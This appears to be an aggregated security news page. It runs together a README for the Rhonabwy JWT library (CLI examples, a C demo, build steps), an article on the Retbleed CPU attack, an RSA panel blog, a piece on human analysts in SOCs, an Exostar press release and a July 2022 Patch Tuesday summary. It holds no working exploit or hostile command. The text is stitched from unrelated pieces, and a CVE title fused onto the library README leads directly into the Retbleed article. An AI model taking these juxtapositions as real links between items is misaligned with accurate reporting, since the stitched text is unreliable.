*   Generate and/or parse keys and output the result in a JWKS or a public/private pair of JWKS files.
*   Parse, decrypt, and/or verify signature of a JWT, using given key
*   Serialize a JWT, the JWT can be signed, encrypted or nested

Example commands to generate a RSA2048 key pair, serialize a JWT signed with the private key, then parse the serialized token and verifies the signature with the public key.

$ rnbyc -j -g RSA2048 -o priv.jwks -p pub.jwks
$ rnbyc -s '{"iss":"https://rhonabwy.tld","aud":"abcxyz1234"}' -K priv.jwks -a RS256
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6ImVNdnI3bktBX2I5QUI4NGpMU05zTFFKZHRmdHpadnllV2M1V0VVMjhnRFkifQ.eyJpc3MiOiJodHRwczovL3Job25hYnd5LnRsZCIsImF1ZCI6ImFiY3h5ejEyMzQifQ.j6v-yxcWvHhyLIc-r3Nzn5rCF9yeJJzgyLSHW\_10wREfckspbzf8UTof5Zsrwg8JvKNlJ4Tt4ZffJC4BkkehdBYXPrgcfq9NtvNYsRmAdiNJhOXtZCU9j9X89j2xhY7pRBgWENI9c3730cmAUgaC-IUKsoNRw\_dd-eboyrgYKIzUCYRnuwqDB31T2oUSVjy6CckoenyoeHJhHg-x384G-g4ovP1l-L4YpjgCyr6BR8mjBFwHU56MP6hNN299HpUd56usQ3vMn7z5hL6QqE92qz-SsJBySrv8whLWjjN9J4Wq5g3\_R7Qw00x60bFnuCDhPBjg3EPXXGqlI0x0vwgwHw
$ rnbyc -P pub.jwks -t eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6ImVNdnI3bktBX2I5QUI4NGpMU05zTFFKZHRmdHpadnllV2M1V0VVMjhnRFkifQ.eyJpc3MiOiJodHRwczovL3Job25hYnd5LnRsZCIsImF1ZCI6ImFiY3h5ejEyMzQifQ.j6v-yxcWvHhyLIc-r3Nzn5rCF9yeJJzgyLSHW\_10wREfckspbzf8UTof5Zsrwg8JvKNlJ4Tt4ZffJC4BkkehdBYXPrgcfq9NtvNYsRmAdiNJhOXtZCU9j9X89j2xhY7pRBgWENI9c3730cmAUgaC-IUKsoNRw\_dd-eboyrgYKIzUCYRnuwqDB31T2oUSVjy6CckoenyoeHJhHg-x384G-g4ovP1l-L4YpjgCyr6BR8mjBFwHU56MP6hNN299HpUd56usQ3vMn7z5hL6QqE92qz-SsJBySrv8whLWjjN9J4Wq5g3\_R7Qw00x60bFnuCDhPBjg3EPXXGqlI0x0vwgwHw
Token signature verified
{
  "iss": "https://rhonabwy.tld",
  "aud": "abcxyz1234"
}

Check its documentation

**API Documentation**

Documentation is available in the documentation page: https://babelouest.github.io/rhonabwy/

Example program to parse and verify the signature of a JWT using its public key in JWK format:

/\*\*
 \* To compile this program run:
 \* gcc -o demo\_rhonabwy demo\_rhonabwy.c -lrhonabwy
 \*/
#include <stdio.h\>
#include <rhonabwy.h\>

int main(void) {
  const char token\[\] = "eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiIsImtpZCI6IjEifQ."                                     // Header
                       "eyJzdHIiOiJwbG9wIiwiaW50Ijo0Miwib2JqIjp0cnVlfQ."                                         // Claims
                       "ooXNEt3JWFGMuvkGUM-szUOU1QTu4DvyC3qQP64UGeeJQuMGupBCVATnGkiqNLiPSJ9uBsjZbyUrWe8z7Iag\_A"; // Signature

  const char jwk\_pubkey\_ecdsa\_str\[\] = "{"
                                        "\\"kty\\":\\"EC\\","
                                        "\\"crv\\":\\"P-256\\","
                                        "\\"alg\\":\\"ES256\\","
                                        "\\"x\\":\\"MKBCTNIcKUSDii11ySs3526iDZ8AiTo7Tu6KPAqv7D4\\","
                                        "\\"y\\":\\"4Etl6SRW2YiLUrN5vfvVHuhp7x8PxltmWWlbbM4IFyM\\","
                                        "\\"kid\\":\\"1\\","
                                        "\\"use\\":\\"sig\\""
                                      "}";

  unsigned char output\[2048\];
  size\_t output\_len = 2048;
  jwk\_t \* jwk = NULL;
  jwt\_t \* jwt = NULL;
  char \* claims;

  if ((jwk = r\_jwk\_quick\_import(R\_IMPORT\_JSON\_STR, jwk\_pubkey\_ecdsa\_str)) != NULL && (jwt = r\_jwt\_quick\_parse(token, R\_PARSE\_NONE, 0)) != NULL) {
    if (r\_jwk\_export\_to\_pem\_der(jwk, R\_FORMAT\_PEM, output, &output\_len, 0) == RHN\_OK) {
      printf("Exported key:\\n%.\*s\\n", (int)output\_len, output);
      if (r\_jwt\_verify\_signature(jwt, jwk, 0) == RHN\_OK) {
        claims = r\_jwt\_get\_full\_claims\_str(jwt);
        printf("Verified payload:\\n%s\\n", claims);
        r\_free(claims);
      } else {
        fprintf(stderr, "Error r\_jwt\_verify\_signature\\n");
      }
    } else {
      fprintf(stderr, "Error r\_jwk\_export\_to\_pem\_der\\n");
    }
  } else {
    fprintf(stderr, "Error parsing\\n");
  }
  r\_jwk\_free(jwk);
  r\_jwt\_free(jwt);

  return 0;
}

**Installation**

Rhonabwy is available in the following distributions.

**Dependencies**

Rhonabwy is based on Nettle, GnuTLS, Jansson, zlib, libcurl and libsystemd (if possible), you must install those libraries first before building Rhonabwy.

You also need check and Ulfius to run the tests.

**Prerequisites**

You need Orcania and Yder.

Those libraries are included in the package rhonabwy-dev-full_{x.x.x}_{OS}_{ARCH}.tar.gz in the Latest release page. If you're building with CMake, they will be automatically downloaded and installed if missing.

**Pre-compiled packages**

You can install Rhonabwy with a pre-compiled package available in the release pages.

**rhonabwy-dev-full packages**

The rhonabwy-dev-full contain 4 different packages:

*   liborcania-dev\_x.x.x\_.ext
*   libyder-dev\_y.y.y\_.ext
*   libulfius-dev\_z.z.z\_.ext
*   librhonabwy-dev\_a.a.a\_.ext

You only need to install liborcania-dev_*, libyder-dev_* for librhonabwy-dev_* to work. libulfius-dev_* isn't required unless you want to run the test suite.

**Manual install****CMake - Multi architecture**

CMake minimum 3.5 is required.

Run the CMake script in a sub-directory, example:

$ git clone https://github.com/babelouest/rhonabwy.git
$ cd rhonabwy/
$ mkdir build
$ cd build
$ cmake ..
$ make && sudo make install

The available options for CMake are:

*   -DWITH_JOURNALD=[on|off] (default on): Build with journald (SystemD) support
*   -BUILD_RHONABWY_TESTING=[on|off] (default off): Build unit tests
*   -DINSTALL_HEADER=[on|off] (default on): Install header file rhonabwy.h
*   -DBUILD_RPM=[on|off] (default off): Build RPM package when running make package
*   -DCMAKE_BUILD_TYPE=[Debug|Release] (default Release): Compile with debugging symbols or not
*   -DBUILD_STATIC=[on|off] (default off): Compile static library
*   -DBUILD_RHONABWY_DOCUMENTATION=[on|off] (default off): Build documentation with doxygen
*   -DWITH_CURL=[on|off] (default on): Use libcurl to download remote content

**Good ol' Makefile**

Download Rhonabwy from GitHub repository, compile and install.

$ git clone https://github.com/babelouest/rhonabwy.git
$ cd rhonabwy/src
$ make
$ sudo make install

To disable curl library on build (to avoid its dependencies), you can pass the option DISABLE_CURL=1 to the make command.

$ cd rhonabwy/src
$ make DISABLE\_CURL=1
$ sudo make install

By default, the shared library and the header file will be installed in the /usr/local location. To change this setting, you can modify the DESTDIR value in the src/Makefile.

Example: install Rhonabwy in /tmp/lib directory

$ cd src
$ make && make DESTDIR=/tmp install

You can install Rhonabwy without root permission if your user has write access to $(DESTDIR). A ldconfig command is executed at the end of the install, it will probably fail if you don't have root permission, but this is harmless. If you choose to install Rhonabwy in another directory, you must set your environment variable LD_LIBRARY_PATH properly.

CVE-2022-32096: GitHub - babelouest/rhonabwy: Javascript Object Signing and Encryption (JOSE) library - JWK, JWKS, JWS, JWE and JWT

The exploit can leak password information and other sensitive material, but the chipmakers are rolling out mitigations.

Some microprocessors from Intel and AMD are vulnerable to a newly discovered speculative execution attack that can covertly leak password data and other sensitive material, sending both chipmakers scrambling once again to contain what is proving to be a stubbornly persistent vulnerability.

Researchers from ETH Zurich have named their attack Retbleed because it exploits a software defense known as retpoline, which chipmakers introduced in 2018 to mitigate the harmful effects of speculative execution attacks. Speculative execution attacks, also known as Spectre, exploit the fact that when modern CPUs encounter a direct or indirect instruction branch, they predict the address for the next instruction they’re about to receive and automatically execute it before the prediction is confirmed. Spectre works by tricking the CPU into executing an instruction that accesses sensitive data in memory that would normally be off-limits to a low-privileged application. Retbleed then extracts the data after the operation is canceled.

Is It a Trampoline or a Slingshot?

Retpoline works by using a series of return operations to isolate indirect branches from speculative execution attacks, in effect erecting the software equivalent of a trampoline that causes them to safely bounce. Stated differently, a retpoline works by replacing indirect jumps and calls with returns, which many researchers presumed weren’t susceptible. The defense was designed to counter variant 2 of the original speculative execution attacks from January 2018. Abbreviated as BTI, the variant forces an indirect branch to execute so-called gadget code, which in turn creates data to leak through a side channel.

Some researchers have warned for years that retpoline isn’t sufficient to mitigate speculative execution attacks because the returns retpoline used were susceptible to BTI. Linux creator Linus Torvalds famously rejected such warnings, arguing that such exploits weren’t practical.

The ETH Zurich researchers have conclusively shown that retpoline is insufficient for preventing speculative execution attacks. Their Retbleed proof-of-concept works against Intel CPUs with the Kaby Lake and Coffee Lake microarchitectures as well as with AMD Zen 1, Zen 1+, and Zen 2 microarchitectures.

“Retpoline, as a Spectre-BTI mitigation, fails to consider return instructions as an attack vector,” researchers Johannes Wikner and Kaveh Razavi wrote. “While it is possible to defend return instructions by adding a valid entry to the RSB return stack buffer before executing the return instruction, treating every return as potentially exploitable in this way would impose a tremendous overhead. Previous work attempted to conditionally refill the RSB with harmless return targets whenever a perCPU counter that tracks the call stack depth reaches a certain threshold, but it was never approved for upstream. In the light of Retbleed, this mitigation is being re-evaluated by Intel, but AMD CPUs require a different strategy.”

In an email, Razavi explained it this way:

_Spectre variant 2 exploited indirect branches to gain arbitrary speculative execution in the kernel. Indirect branches were converted to returns using the retpoline to mitigate Spectre variant 2._

_Retbleed shows that return instructions unfortunately leak under certain conditions similar to indirect branches. These conditions are unfortunately common on both Intel (Skylake and Skylake-based) and AMD (Zen, Zen+ and Zen2) platforms. This means that retpoline was unfortunately an inadequate mitigation to begin with._

In response to the research, both Intel and AMD advised customers to adopt new mitigations that the researchers said will add as much as 28 percent more overhead to operations.

Retbleed can leak kernel memory from Intel CPUs at about 219 bytes per second and with 98 percent accuracy. The exploit can extract kernel memory from AMD CPUs with a bandwidth of 3.9 kB per second. The researchers said that it’s capable of locating and leaking a Linux computer’s root password hash from physical memory in about 28 minutes when running the Intel CPUs and in about six minutes for AMD CPUs.

Retbleed works by using code that essentially poisons the branch prediction unit that CPUs rely on to make their guesses. Once the poisoning is complete, this BPU will make mispredictions that the attacker can control.

“We found that we can inject branch targets that reside inside the kernel address-space, even as an unprivileged user,” the researchers wrote in a blog post. “Even though we cannot access branch targets inside the kernel address-space—branching to such a target results in a page fault—the Branch Prediction Unit will update itself upon observing a branch and assume that it was legally executed, even if it's to a kernel address.”

Intel and AMD Respond

Both Intel and AMD have responded with advisories. Intel has confirmed that the vulnerability exists on Skylake-generation processors that don’t have a protection known as enhanced Indirect Branch Restricted Speculation (eIBRS) in place.

“Intel has worked with the Linux community and VMM vendors to provide customers with software mitigation guidance which should be available on or around today's public disclosure date,” Intel wrote in a blog post. “Note that Windows systems are not affected given that these systems use Indirect Branch Restricted Speculation (IBRS) by default which is also the mitigation being made available to Linux users. Intel is not aware of this issue being exploited outside of a controlled lab environment.”

AMD, meanwhile, has also published guidance. “As part of its ongoing work to identify and respond to new potential security vulnerabilities, AMD is recommending software suppliers consider taking additional steps to help guard against Spectre-like attacks,” a spokesman wrote in an email. The company has also published a white paper.

Both the researchers’ research paper and blog post explain the microarchitectural conditions necessary to exploit Retbleed:

_**Intel**. On Intel, returns start behaving like indirect jumps when the Return Stack Buffer, which holds return target predictions, is underflowed. This happens upon executing deep call stacks. In our evaluation we found over a thousand of such conditions that can be triggered by a system call. The indirect branch target predictor for Intel CPUs has been studied in_ _previous work__._

_**AMD**. On AMD, returns will behave like an indirect branch regardless of the state of their Return Address Stack. In fact, by poisoning the return instruction using an indirect jump, the AMD branch predictor will assume that it will encounter an indirect jump instead of a return and consequentially predict an indirect branch target. This means that any return that we can reach through a system call can be exploited—and there are tons of them._

In an email, Razavi added: “Retbleed is more than just a retpoline bypass on Intel, specially on AMD machines. AMD is in fact going to release a white paper introducing Branch Type Confusion based on Retbleed. Essentially, Retbleed is making AMD CPUs confuse return instructions with indirect branches. This makes exploitation of returns very trivial on AMD CPUs.”

The mitigations will come at a cost that the researchers measured to be between 12 percent and 28 percent more computational overhead. Organizations that rely on affected CPUs should carefully read the publications from the researchers, Intel, and AMD, and be sure to follow the mitigation guidance.

_This story originally appeared on_ _Ars Technica__._

New ‘Retbleed’ Attack Can Swipe Key Data From Intel and AMD CPUs

The morning of June 9th, I was driving over the Golden Gate Bridge into San Francisco with my family. While crossing the bridge my children shared some facts about this modern engineering marvel. Each day, approx. 100,000 vehicles travel over the bridge deck, which weighs a staggering 150,000 tons, and is suspended by 250 pairs …
  All Hands-on Deck: A Whole-of-Society Approach for Cybersecurity Read More »

The morning of June 9th, I was driving over the Golden Gate Bridge into San Francisco with my family. While crossing the bridge my children shared some facts about this modern engineering marvel. Each day, approx. 100,000 vehicles travel over the bridge deck, which weighs a staggering 150,000 tons, and is suspended by 250 pairs of steel ropes.

We noted that a single steel rope could not withstand such an enormous weight. But when hundreds work together in unison, their combined strengths are sufficient to support the monumental load of the bridge and its occupants, with capacity to absorb fluctuations in traffic volumes and high stress events like windstorms and earthquakes.

Like the steel ropes of the Golden Gate Bridge, we in the cybersecurity community cannot carry the load alone, but together “with all hands-on deck”, we can address even the largest challenges.

That afternoon at the RSA Conference 2022, I had the pleasure of moderating a panel with Microsoft’s Aanchal Gupta (@nchlgpt), Intel’s Tom Garrison (@tommgarrison) and the NSA’s (@NSAGov) Dr. Diane Janosek (@dm\_janosek) where we discussed how to overcome a culture of secrecy to create transparent and trusted cross-organization collaboration, and the challenge of encouraging responsible disclosure without the fear of backlash.

In this blog I will summarize the topics discussed by each of the panelists, starting with the **threats that are driving the need for greater collaboration.**

At the beginning of the discussion, Aanchal highlighted that **Software Supply Chain** attacks are both one of the industry’s biggest risks and therefore priorities to address saying “even though this is not a new risk, our reliance on third party and open-source software is exponentially increasing, and it is only a matter of time before we see more supply chain issues. Log4j and Nobelium are just the tip of the iceberg.”

Aanchal then explained that there are two primary reasons why supply chain attacks will continue to rise. “First, as our dependence on third party software is growing, it is becoming more attractive for threat actors to find the soft spots. Attackers could easily convince an insider, or they could find an unpatched vulnerability, to inject their malicious payload into the supply chain. What makes it extremely difficult is that certain software is ubiquitous, “like salt in your pantry”. Salt is in almost every snack item in your pantry, and you can imagine if that is contaminated, how difficult it will be to address the issue. Log4j became a challenging issue because of its pervasive use.”

Tom further elaborated on how the supply chain is evolving into a platform with a “digital DNA” and the importance of **System, Traceability** and **Transparency**. “What we want to do is to peel back this sort of _almost_ secrecy that’s existed around what components are used to build your device–whether it’s a PC or a server or an IOT device. These are the foundation of trust and empower customers to make intelligent decisions around their platforms. In order to maintain a healthy system, it is important to ask questions about **Patching**. How do I manage my system overtime? Am I smart about updates and applying them in a timely manner? Do I have a process around updating these machines on a regular basis? This is the very first step towards transparency and is a great healthy step.”

Diane then highlighted the strategic importance of also considering the threats associated with **Adversarial AI**. “While AI has phenomenal machine learning usages, helping make sense of the massive data sets – the entire inference depends upon the integrity of that data for the algorithms to _actually_ work. “If the adversaries are altering that data, recognizing that we’re using certain models for critical security decisions and more, our models will be incorrect”. Understanding the world of human generated attacks vs. the AI based attack surface raises the level of sophistication and complexity that we must get ahead of.”

Next, Aanchal discussed how organizations can foster collaboration to raise the bar for security, starting with the concept of a **Software Bill of Materials (SBOM)**. To get ahead of supply chain risks, it helps to think of your SBOM as a “recipe”.

1.  First, **know what ingredients make up your recipe**. Do you have a list of all the software in your organization? If not, you need to create one.
2.  Next, **understand where your ingredients come from** and what controls are in place to ensure their reliability as they are produced and delivered to you.
3.  And finally, trust but verify. **Test your ingredients regularly to ensure their integrity.**

To mitigate some of this risk, the US Government issued an Executive Order (EO) earlier this year. The EO is the start of the process of the US government identifying the problems and engaging with the private sector to define solutions. This is a multi-year effort that will profoundly change the requirements to sell software to the US government, one of the largest tech buyers on the planet. As we help shape the EO, we will raise the difficulty of attacking the US government, and overall software.  

As the largest provider of enterprise software, we have a responsibility to provide leadership and help – with things like the SBOM – where you call out the dependencies that each piece of software has. We are actively participating in helping shape the underpinnings of the EO. 

Tom then discussed the importance of collaborating with both external AND internal researchers. “To build a deep understanding of the products and HW/SW solutions stacks, this requires partnerships with ethical hackers, and security investments to drive deeper research to ensure that the learnings not only fix legacy and historical problems, but also ensure long-term safety as we shape future products and technologies.”

The panel then moved onto discussing the paradoxical need for transparency and responsible disclosure within a culture of secrecy. This was talked about with great energy and passion, not just by the panelists but also by members of the audience. There is always the tension of how we maintain confidentiality about the vulnerability until all the partners have a mitigation or fix, but also ensure that stakeholders are well informed. This is not just about doing the right thing morally, but it is also good for business to share the information in a timely manner. We are at an inflection point; where this clarity and realization is helping drive intentional collaboration on vulnerability disclosure to patching as a priority and we look forward to making measurable progress here.

The panel agreed that we should not penalize and ostracize people for sharing a breach of their system. We need to shift the culture from blame to community support. When we support organizations to be forthcoming with their experience, we will get better insights and it will also help identify supply chain issues early on. It is due to the fear of retaliation that people don’t share the details. Help them become better vendors and service providers by sharing their knowledge. Their breach is not just their breach anymore; we are all in this together.

Finally, the conversation shifted to working with law enforcement to ensure cyber criminals are held accountable. Diane gave this wonderful example: “Consider critical infrastructure sectors for the United States (e.g., energy sector, transportation sector etc.). 80% are run by the private sector, and 20% by the government. So even if I, as the government, get an A grade for my 20% (which is defense and telecommunications), it’s not good enough for the country if all other sectors fail. We need to establish the fine balance to be able to do the signals intelligence mission and the cyber security mission across government and private sector, to get holistic protection, while protecting the Constitution”. This is a crucial point for a whole-of-society approach; we must continue to partner with all sectors – private and government – to ensure we preserve privacy and security, holistically.

Thinking back to the Golden Gate bridge, the individual steel hangers do not support just the vehicles directly beneath them. Each hanger is critical in supporting the entire bridge and every vehicle travelling on it, no matter where on the bridge a vehicle happens to be. Similarly, for those of us in the cybersecurity industry and our respective customers and products, when we work together, we create a stronger and more resilient foundation for all.

Watch the panel on demand at this link: https://cybersecurityinside.com/video/cybersecurity-rsa-panelists/

Listen to the panel on demand at this link: https://cybersecurityinside.com/episodes/protect-cyber-collaboration-rsa/

Read Tom Garrison’s ‘Supply Chain Security is Evolving into a Platform with “Digital DNA”’ blog at this link: https://buff.ly/3xEYb2A

All Hands-on Deck: A Whole-of-Society Approach for Cybersecurity

Machine learning and automation can help free up security pros for higher-value tasks.

Humans have a well-deserved reputation for being the weakest link in the cybersecurity of any size organization. Whether it's an IT specialist misconfiguring a firewall setting, a DevOps engineer failing to secure a cloud storage bucket, or a hapless business user falling for a phishing scam, the vast majority of cybersecurity breaches are primarily caused by human error creating exploitable vulnerabilities. The result is many avoidable weaknesses being pursued by criminal opportunists enabled by cheap, plentiful cybercrime tools of the trade.

Thankfully, the humans working in the security operations center (SOC), the Tier 1 and Tier 2 analysts on the front line of cyber defense, are the strongest link in cybersecurity operations. They must be kept in the loop, ideally performing higher-value tasks than keeping "eyes on the glass" to review security telemetry.

**Tools for Assisting, Not Replacing, Humans  
**

Looking to technology to help us secure technology is the right approach. The servers, Web applications, endpoints, network devices, and security measures in a company's digital landscape produce massive volumes of security telemetry and alerts that must be monitored and analyzed, but most turn out to be benign.

Identifying the meaningful alerts in high-volume event streams is the perfect job for correlation rules and unsupervised machine learning (ML) algorithms that combine human knowledge and threat intelligence with continuous learning and improvement. Machines can handle the speed and scale required for the initial screening of the high-volume stream of event logs and alerts. Also, algorithms don't get tired or have a lapse in attention, go on vacation, or call in sick.

Automating this facet of SOC operations allows these AI-based tools to do the tedious work of sifting out false positives and correlating and surfacing real alerts in real time. Automation can also go a step further, applying rules in playbooks to enrich alerts with context (which machine or user, what happened, when), contain suspicious activity in the network, and trigger an automatic response in well-defined use cases.

The result can be minimizing the volume of alerts by a factor of 10 or more, from 10,000 a day to 1,000 or less. This noise reduction saves up to 50% of expert SOC labor, dramatically increasing SOC efficiency and effectiveness.

**Humans Are the Ones Who Catch the Cybercriminals in Action  
**

This type of automation frees expert human analysts to use their experience, skills, intuition, and problem solving in the hunt for cybercriminals active in your environment. The automation feeds junior SOC analysts who triage the findings by applying human intelligence to recognizing patterns, evaluating anomalies, eliminating false positives, and identifying alerts that need further human assessment.

For example, John in HR typically accesses two databases during regular business hours. An alert comes through that John has accessed a third database on a Saturday. Only a human can determine if this new behavior is anomalous but nonthreatening. After the SOC analyst notifies the IT department about the unexpected database activity, IT confirms that John has been granted temporary access to the additional data, which is HR-related.

After triage by junior SOC analysts, high-priority alerts are forwarded to SOC senior analysts. These skilled security specialists are charged with investigating the alerts and identifying where an attack is coming from, the cybercrime groups behind the attack, methods they are using, lateral movement observed, and the dwell time of attackers. SOC experts also propose strategies for mitigation and eradication.

Humans are most essential when identifying attacks that cut across different systems, applications, and access methods. It was skilled humans who uncovered new activity on the part of Hafnium. The nation-state cybercriminals had been exploiting vulnerabilities in Microsoft Exchange servers to steal emails, compromise networks, and move laterally in affected organizations. These incursions took place for three months prior to discoveries credited by Microsoft to researchers at security firms Volexity and Dubex.

**Key Takeaways  
**

Organizations of any size, but particularly midsize and larger enterprises, can benefit from having their SOCs use artificial intelligence, unsupervised ML, and automation to remove the burden of first-level event log screening from junior analysts and provide intelligence that senior analysts can use in investigations. Such automation is necessary to handle the ever-increasing volume, velocity, and variety of security telemetry. It cannot, however, eliminate the need for the expert human analyst.

SOC analysts need not be concerned about job security in the face of ML and automation. Rather, they should welcome the improved productivity and freedom automation provides to use their intelligence and creativity for higher-value activities such as research, threat analysis, remediation, and threat hunting.

Keep Humans in the Loop in SOC Operations

Upgrades to the Exostar platform promote secure, compliant collaboration and handling of controlled unclassified information.

**HERNDON, VA, July 12, 2022 –** Exostar, a leader in trusted, secure business collaboration in highly regulated industries including aerospace and defense, today announced the availability of updates to The Exostar Platform that allow small and medium-sized businesses (SMBs) to overcome the technology, time, and cost obstacles of preparing for and demonstrating compliance with Department of Defense (DoD) cybersecurity requirements.

Firms throughout the Defense Industrial Base (DIB), including SMBs deep in the DoD supply chain, will have to acquire Cybersecurity Maturity Model Certification (CMMC) 2.0 certification as soon as May 2023 to participate in subsequent DoD contract solicitations. According to CMMC version 2.0, any member of the DIB that stores or handles Controlled Unclassified Information (CUI) during program execution must meet the 110 practices defined at CMMC Maturity Level 2. Many SMBs simply do not possess the expertise, bandwidth, or budget to go it alone.

Exostar’s Managed Microsoft 365 for CMMC directly addresses these challenges. This managed solution, based on Microsoft Teams and hosted in a Microsoft 365 Government Cloud Computing (GCC) High environment, is designed specifically for SMBs and delivers benefits including:

*   A secure workspace for SMB users within GCC High – without the expense and burden of acquiring, setting up, and managing their own tenant.
*   Rapid onboarding – subscribe today and be working tomorrow.
*   Implementation of the security controls necessary to properly protect CUI – and facilitate compliance with CMMC 2.0 and other DoD cybersecurity standards.
*   Enterprise-grade security at a price SMBs can afford, with room to grow for an enterprise license.

In addition to the launch of Exostar’s Managed Microsoft 365 for CMMC, the company has updated and upgraded its CMMC Ready Suite within The Exostar Platform to provide out-of-the-box support to accelerate SMBs throughout their CMMC 2.0 accreditation journeys:

*   Certification Assistant – Offers plainspoken descriptions of CMMC practices at all three Maturity Levels, helping SMBs to conduct compliance self-assessments and scoring, gather documentation, and prepare for any necessary third-party audits ahead of accreditation.
*   Exostar PolicyPro – Evaluates existing policies (including gap analysis) and/or generates new ones in accordance with all policy requirements defined in CMMC 2.0 practices.
*   CMMC 2.0 Basic Assessment – Provides expert guidance from Exostar-vetted cybersecurity compliance specialist partners who use Exostar’s CMMC Ready Suite to address an SMB’s unique circumstances and accelerate the accreditation process.

“SMBs are the lifeblood of the DIB. While they must improve their cybersecurity capabilities to better protect CUI throughout the DoD supply chain, CMMC 2.0 represents a heavy lift for many of these companies,” said Tony Farinaro, Exostar’s Chief Revenue Officer. “We continue to enhance and expand our CMMC offerings to make it easier and more cost effective for SMBs to meet their obligations so they can stay in the DIB, win business, and keep innovating on behalf of the DoD.”

In addition to SMBs, enterprises also can subscribe to Exostar’s Managed Microsoft 365 for CMMC, as well as purchase the other applications and services in The Exostar Platform’s CMMC Ready Suite, today.

**About Exostar**

The Exostar Platform supports exclusive communities within highly regulated industries where organizations securely collaborate, share information, and operate compliantly. Within these communities, we build trust. More than 150,000 companies and agencies in 175 countries trust Exostar to strengthen security, reduce expenditures, raise productivity, and help them achieve their digital transformation initiatives. Nearly half of the Defense Industrial Base, including 98 of the top 100, transact business over The Exostar Platform. Eleven of the top twenty global biopharmaceutical companies rely on The Exostar Platform to help them speed new medicines and therapies to market. Exostar is a Gartner Cool Vendor. For more information, please visit www.exostar.com, and follow Exostar on LinkedIn and Twitter.

Exostar Empowers SMBs with Enhanced, Low-Cost, Easy-to-Use Microsoft 365 and CMMC 2.0 Solutions

July's Patch Tuesday gives us a lot of important security updates. Most prominently, a known to be exploited vulnerability in Windows CSRSS.
The post Update now—July Patch Tuesday patches include fix for exploited zero-day appeared first on Malwarebytes Labs.

It’s time to triage a lot of patching again. Microsoft’s July Patch Tuesday includes an actively exploited local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem (CSRSS). This vulnerability immediately made it to the Cybersecurity & Infrastructure Security Agency (CISA) list of known to be exploited in the wild list that are due for patching by August 2, 2022.

**Microsoft**

In total the Microsoft updates include fixes for 84 vulnerabilities. Four of these vulnerabilities are labelled as “Critical” since they are remote code execution (RCE) vulnerabilities.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that ware assigned to the four Critical vulnerabilities:

CVE-2022-22029: Windows Network File System (NFS) RCE vulnerability. This vulnerability is not exploitable in NFSV4.1. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV3, but this may adversely affect your ecosystem and should only be used as a temporary mitigation.

CVE-2022-22039: Another Windows Network File System (NFS) RCE vulnerability. It’s possible to exploit this vulnerability over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger an RCE.

CVE-2022-22038: Remote Procedure Call Runtime RCE vulnerability. Successful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.

CVE-2022-30221: Windows Graphics Component RCE vulnerability. An attacker would have to convince a targeted user to connect to a malicious RDP server. On connecting, the malicious server could execute code on the victim’s system in the context of the targeted user.

**Azure Site Recovery**

A huge part of the patches consist of 32 vulnerabilities in the Azure Site Recovery suite that could have allowed attackers to gain elevated privileges or perform remote code execution. Azure Site Recovery is an integrated disaster recovery service for Azure that helps ensure business continuity by keeping business apps and workloads running during outages.

According to Microsoft, SQL injection vulnerabilities caused most of the privilege escalation bugs in Azure Site Recovery.

**CVE-2022-22047**

The vulnerability that is known to be exploited in the wild is an elevation of privilege (EoP) vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.

This type of vulnerability usually comes into play once an attacker has gained an initial foothold. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.

The vulnerability is described as a Windows CSRSS Elevation of Privilege vulnerability. CSRSS is the Windows component that provides the user mode side of the Win32 subsystem. CSRSS is critical for a system’s operation and is mainly responsible for Win32 console handling and GUI shutdown.

This type of vulnerability are often chained together with others in macros, which makes the decision to roll back Office Macro blocking incomprehensible, even if it is only temporary.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

Adobe released security updates for Acrobat, Character Animator, Photoshop,  Reader, and RoboHelp.

Cisco released critical updates for Cisco Expressway Series, Cisco TelePresence Video Communication Server, Cisco Email Security Appliance, Cisco Secure Email and Web Manager, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers, and several other security updates.

Citrix released hotfixes to address a problem that may affect Citrix Hypervisor and Citrix XenServer under some circumstances.

Google released Android’s July security updates including 3 labelled as “Critical”.

SAP released its July 2022 Patch Day bulletin with 20 new Security Notes.

VMWare released security updates.

Stay safe, everyone!

Tag

#mac